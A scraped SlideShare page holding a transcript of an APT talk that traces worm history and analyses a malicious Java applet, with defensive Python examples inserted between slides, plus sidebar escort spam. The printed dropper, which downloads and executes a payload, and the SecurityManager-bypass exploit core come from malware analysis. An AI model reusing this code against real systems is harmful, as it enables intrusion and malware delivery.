Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Codemotion
 
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Codemotion
 
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Codemotion
 
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Codemotion
 

Mehr von Codemotion (20)

Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
 
Pastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaPastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storia
 
Pennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserPennisi - Essere Richard Altwasser
Pennisi - Essere Richard Altwasser
 
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
 
Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019
 
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
 
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri  - Deliver Data at Scale - Codemotion Amsterdam 2019 - Francesco Baldassarri  - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
 
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
 
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
 
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
 
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
 
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
 
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
 
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
 
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
 
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
 
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
 
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
 
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
 
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
 

KĂŒrzlich hochgeladen

Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...gurkirankumar98700
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel AraĂșjo
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 

KĂŒrzlich hochgeladen (20)

Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 

The magic world of APT 0.6 - Pompili

  • 6. <2001> The Nimda Style. Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability; Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability; Microsoft IE MIME Header Attachment Execution Vulnerability; TFTP server on UDP:69; RICHED20.DLL (Microsoft Office 2000 DLL Execution Vulnerability); Microsoft IE MIME Header Attachment Execution Vulnerability. 635 million dollars.
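The two IIS/PWS bugs on this slide share one root cause: the traversal check ran on a partially decoded path, and the decoding that turned "%c0%af" (an overlong UTF-8 encoding of "/") or "%255c" (a double-encoded "\") into a separator happened only afterwards. The following is an added example, not code from the slides or from IIS: a toy resolver that reproduces that ordering mistake next to a hardened one that decodes strictly, exactly once, and checks the final canonical path. The web root and request paths are constructed for the example.

```python
"""Added example: check-then-decode ordering behind the two IIS/PWS bugs Nimda used.

Nothing here is IIS code; it is a minimal model of the mistake. The web root and
the request paths are constructed test inputs, not taken from the slides.
"""
import posixpath
import re
from urllib.parse import unquote, unquote_to_bytes

WEBROOT = "/inetpub/wwwroot"                                   # constructed
UNICODE_TRAVERSAL = "/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe"   # overlong "/"
DOUBLE_DECODE = "/scripts/..%255c..%255cwinnt/system32/cmd.exe"         # %25 -> %, then %5c -> "\"
PLAIN_TRAVERSAL = "/scripts/..%2f..%2fwinnt/system32/cmd.exe"           # the obvious form

# Traversal pattern as an early-2000s server might have checked it: ".." followed by a separator.
TRAVERSAL = re.compile(rb"\.\.[\\/]")


def lenient_utf8(data: bytes) -> str:
    """Decoder that accepts overlong two-byte sequences (C0 AF -> '/').

    Modern decoders reject these; the affected IIS versions did not. Anything
    outside ASCII or a two-byte sequence is replaced with U+FFFD for brevity.
    """
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b < 0xE0 and i + 1 < len(data) and data[i + 1] & 0xC0 == 0x80:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))  # no overlong check
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def vulnerable_resolve(webroot: str, raw_path: str) -> str:
    """Model of the bug: the traversal check runs between two decoding steps."""
    once = unquote_to_bytes(raw_path)       # first percent-decode: %2f -> "/", %25 -> "%"
    if TRAVERSAL.search(once):              # the check fires here for the plain form...
        raise PermissionError("traversal rejected")
    text = lenient_utf8(once)               # ...but C0 AF only becomes "/" now,
    text = unquote(text)                    # ...and %5c only becomes "\" now.
    text = text.replace("\\", "/")
    return posixpath.normpath(posixpath.join(webroot, text.lstrip("/")))


def hardened_resolve(webroot: str, raw_path: str) -> str:
    """Decode strictly and exactly once, canonicalise, then check the result."""
    try:
        text = unquote_to_bytes(raw_path).decode("utf-8")   # strict: overlong C0 AF is an error
    except UnicodeDecodeError as exc:
        raise PermissionError("malformed UTF-8 in path") from exc
    text = text.replace("\\", "/")                          # no second percent-decode
    resolved = posixpath.normpath(posixpath.join(webroot, text.lstrip("/")))
    if resolved != webroot and not resolved.startswith(webroot + "/"):
        raise PermissionError("traversal rejected")
    return resolved


def leaks_outside_webroot(resolver, webroot: str, raw_path: str) -> bool:
    """True if the resolver returns a path outside webroot (the bug fires)."""
    try:
        resolved = resolver(webroot, raw_path)
    except PermissionError:
        return False
    return resolved != webroot and not resolved.startswith(webroot + "/")


if __name__ == "__main__":
    for name, path in [("unicode", UNICODE_TRAVERSAL), ("double", DOUBLE_DECODE), ("plain", PLAIN_TRAVERSAL)]:
        print(f"{name:8s} vulnerable leaks: {leaks_outside_webroot(vulnerable_resolve, WEBROOT, path)}"
              f"  hardened leaks: {leaks_outside_webroot(hardened_resolve, WEBROOT, path)}")
```

The plain "%2f" form is caught by both resolvers, which is why the check looked adequate at the time; only the overlong and double-encoded forms reach the file system in the vulnerable ordering. The general rule the hardened version applies is: decode once with a strict decoder, canonicalise, and only then compare the final path against the allowed root.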
  • 7. SQL Server 2000 Desktop Engine (the 2003 Slammer worm): 75,000 computers infected in just 10 minutes; a payload of only 376 bytes (resident exclusively in memory). 1.2 billion dollars.
  • 8. MyDoom (2004): 22.6 billion dollars. DDoS against www.sco.com. Upload & Execute: 0x85 0x13 0x3c 0x9e 0xa2. Backdoor on TCP 3127-3198. http://echohacker.altervista.org/articoli/mydoom.html
  • 9. <2010-2012> Government in Action > Stuxnet (2010) > Duqu (2011) > Flame (2012) > Gauss (2012). Shopping For Zero-Days: http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
  • 10. The most complex malware in history > 20 MB in size (900 KB main program/dropper + 16 modules detected so far) > 80 domains used as Command and Control systems > Spreads via USB stick (Infectmedia) > Enumerates Bluetooth devices (Beetlejuice) > Audio recording (Microbe) > Windows Update MITM (Munch & Gadget), MD5 collision attack
  • 11. <2007> Storm Worm & CyberCrime Market http://www.pcworld.com/article/138694/article.html
  • 12. http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/
  • 13. Advanced Persistent Threats 101 > Trust Exploitation: Social Engineering, Spear Phishing, Botnet, Drive-to-Click Strategy
  • 14. Advanced Persistent Threats 101 > Trust Exploitation > Client Exploitation: Exploit Pack (e.g. Neutrino), 0-Day
  • 15. Advanced Persistent Threats 101 > Trust Exploitation > Client Exploitation > Multi-Stage: Dropper/Downloader, Modules (e.g. RAT, Infostealer, etc.), Good Covert Channel
  • 16. Advanced Persistent Threats 101 > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector: Email, WebSites, Botnet, Physical (USB)
  • 17. Advanced Persistent Threats 101 > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector > Resiliency: Camouflaging, Command & Control, Good Covert Channel
  • 18. Make or Buy?
  • 19. The Botnet Choice
  • 20. Drive-to-Click <#1>
  • 21. Drive-to-Click <#2>
  • 22. Drive-to-Click <#3>
  • 23. Drive-to-Click <#4>
  • 24. Drive-to-Click <#5>
  • 25. Trick #1> Playing with extensions: RLO Unicode control character
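The RLO trick on this slide hides the real extension by making the file manager render the tail of the name backwards. As an added example (not part of the deck), the following Python helper shows how a mail gateway or endpoint agent can flag such names: it approximates the rendered name, compares the extension a user would see with the one the OS really uses, and reports any bidi control characters present. The filenames are constructed samples.

```python
import os

# Unicode bidi control characters that can change how a filename is displayed.
# U+202E (RLO) is the one used on the slide; the rest are listed so that the
# same check also catches the related overrides, embeddings and isolates.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF",
    "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}


def displayed_name(name: str) -> str:
    """Approximate what a user sees: the text after an RLO is drawn reversed
    until the matching PDF (U+202C) or the end of the string; the control
    characters themselves are invisible."""
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202e":
            j = name.find("\u202c", i + 1)
            end = len(name) if j == -1 else j
            out.append(name[i + 1:end][::-1])
            i = end + 1 if j != -1 else end
        elif ch in BIDI_CONTROLS:
            i += 1  # other controls: invisible, skip them
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def real_extension(name: str) -> str:
    """The extension the operating system actually acts on, ignoring rendering."""
    return os.path.splitext(name)[1].lower()


def bidi_controls_in(name: str) -> list:
    """Names of the bidi control characters present in the filename, in order."""
    return [BIDI_CONTROLS[c] for c in name if c in BIDI_CONTROLS]


def is_spoofed_extension(name: str) -> bool:
    """True when a bidi control makes the extension a user sees differ from
    the one the OS will use. A plain name without controls is never flagged."""
    if not bidi_controls_in(name):
        return False
    return real_extension(displayed_name(name)) != real_extension(name)


if __name__ == "__main__":
    # Constructed sample: shown as "invoiceexe.pdf", actually an .exe file.
    sample = "invoice\u202efdp.exe"
    print(displayed_name(sample), real_extension(sample), is_spoofed_extension(sample))
```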
  • 26. Trick #2> Content-Disposition Nightmare http://www.gnucitizen.org/blog/content-disposition-hacking/ Download Server Response Headers (RFC 2616)
  • 27. Trick #3> Client Exploiting
        <applet codebase="http://blahblah.evilsite.in/hiddenpath/" archive="http://blahblah.othersite.in/hiddenpath/c8c34734f41cca863a972129369060d9" code="rgmiv">
  • 28. public class xp extends JApplet {
          public void init() {
            try {
              Object aobj[] = new Object[0];
              Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1);
              String s = "hpjwbludyi";
              s = "wgpxrwyvzolbb";
              s = "zdfmvftloqmakqysyu";
              s = "nrrkqnjfylgtljyyferr";
              cr.hzumfnc(obj);
              Object aobj1[] = new Object[0];
              String s1 = "ofvszonrzgelnko";
              s1 = "fefhtspcqhj";
              s1 = "evztavmzjarjgwu";
              Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] { Integer.TYPE }).newInstance(new Object[] { Integer.valueOf(tcbteokd.mdrikbua(9)) });
              int ai[] = new int[8];
              Object aobj2[] = new Object[7];
              aobj2[2] = cr.hzumfnc(obj);
              ...
  • 29. <01> XOR String Encryption (Malware)
        public static String ok = ha.n("1:-:u:,/u26:<>ub:6+7>0264?>7");
        ...
        public static String n(String s) {
          String s1 = "";
          for (int i = 0; i < s.length(); i++)
            s1 += idzfihff(s.charAt(i));
          return s1;
        }
        ...
        public static char idzfihff(char c) {
          return (char)(c ^ 0x5b);
        }
        https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
  • 30. <02> Java Reflection (Malware)
        public static Class fuss(String s) throws Exception {
          return Class.forName(s);
        }
        ...
        public static Object dngfuv(Method method, Object obj, Object aobj[]) {
          return method.invoke(obj, aobj);
        }
        public static Constructor bjixqh(Class class1, Class aclass[]) {
          return class1.getConstructor(aclass);
        }
        ...
        https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
  • 31. <03> ClassLoader Override (Malware)
        class t extends ClassLoader {
          public static void ujrzjw(t t1, String s) {
            try {
              Class class1 = t1.defineClass("qbw", tcbteokd.xcpoalaefqfvuacylvakyi, 0, tcbteokd.xcpoalaefqfvuacylvakyi.length);
              ygigtele.bjixqh(class1, new Class[] { tcbteokd.fuss("java.lang.String") }).newInstance(new Object[] { s });
            } catch (Exception ex) {
              System.exit(0);
            }
          }
        }
  • 32. The Dropper Class
        ...
        private static void lcsqyrgtbct(String s, int i) {
          String s1 = s + Integer.valueOf(i);
          ...
          rchannel = Channels.newChannel((new URL(s1)).openStream());
          ...
          File file = File.createTempFile("~tmf", null);
          FileOutputStream fos = new FileOutputStream(file);
          for (int j = 0; j < abyte0.length; j++)
            abyte0[j] = (byte)(abyte0[j] ^ 0x29);
          fos.write(abyte0);
          if (abyte0.length > 1024)
            try {
              Runtime.getRuntime().exec(new String[] { "cmd.exe", "/C", file.getAbsolutePath() });
            } catch (IOException ioe) {
              (new ProcessBuilder(new String[] { file.getAbsolutePath() })).start();
            }
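Slide 29 (string constants XOR'd with 0x5b) and slide 32 (the downloaded payload XOR'd with 0x29 before it is written and executed) use the same single-byte operation, so one analysis helper serves both. This is an added example, not code from the deck or from the analysed applet: it recovers the key from the obfuscated constants by printability scoring, and from a captured download by the file magic the dropper expects, without running the applet. The obfuscated samples below are constructed.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """The operation behind idzfihff() on slide 29 and the payload loop on
    slide 32: every byte XOR one key byte. XOR is its own inverse, so the
    same call encodes and decodes."""
    return bytes(b ^ key for b in data)


def xor_string(s: str, key: int) -> str:
    """String form, matching ha.n(): character-by-character XOR with the key."""
    return xor_bytes(s.encode("latin-1"), key).decode("latin-1")


def recover_key_by_printability(blob: bytes):
    """Key used on an obfuscated string constant: the one whose output is
    entirely printable ASCII and looks most like a Java class name (letters,
    digits, dots). Returns None when no key gives all-printable output."""
    best_key, best_score = None, -1
    for key in range(256):
        out = xor_bytes(blob, key)
        if not all(0x20 <= b < 0x7F for b in out):
            continue
        score = sum(1 for b in out if chr(b).isalnum() or b == 0x2E)
        if score > best_score:
            best_key, best_score = key, score
    return best_key


def recover_key_by_known_prefix(blob: bytes, prefix: bytes):
    """Key used on a captured download when the decoded file must start with
    a known magic (the dropper on slide 32 hands the file to cmd.exe, so
    b'MZ' is the natural guess). The first byte fixes the key; the rest of
    the prefix must agree, otherwise the guess is rejected."""
    if not blob or not prefix or len(blob) < len(prefix):
        return None
    key = blob[0] ^ prefix[0]
    if xor_bytes(blob[:len(prefix)], key) != prefix:
        return None
    return key


# Constructed samples (not taken from a real applet): a class name hidden
# with the slide's 0x5b key and a fake PE-like payload hidden with the
# dropper's 0x29 key.
OBFUSCATED_CLASS = xor_string("java.lang.Runtime", 0x5B)
OBFUSCATED_PAYLOAD = xor_bytes(b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00", 0x29)

if __name__ == "__main__":
    key = recover_key_by_printability(OBFUSCATED_CLASS.encode("latin-1"))
    print(hex(key), xor_string(OBFUSCATED_CLASS, key))
    key = recover_key_by_known_prefix(OBFUSCATED_PAYLOAD, b"MZ")
    print(hex(key), xor_bytes(OBFUSCATED_PAYLOAD, key)[:4])
```

Run on the constant shown on slide 29 itself, the first fifteen characters decode to java.awt.image. and the remainder no longer decodes cleanly, which is consistent with non-printable bytes having been lost in the slide transcript.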
  • 33. The Malware Core
        Object obj1 = new java.awt.image.DataBufferByte(9);
        int[] ai = new int[8];
        Object[] oo = new Object[7];
        oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);
        ...
        DataBufferByte obj5 = new DataBufferByte(8);
        for (int j = 0; j < 8; j++)
          obj5.setElem(j, -1);
        MultiPixelPackedSampleModel obj6 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4, 1, 1, 4, 0);
        Raster obj7 = Raster.createWritableRaster(obj6, obj5, null);
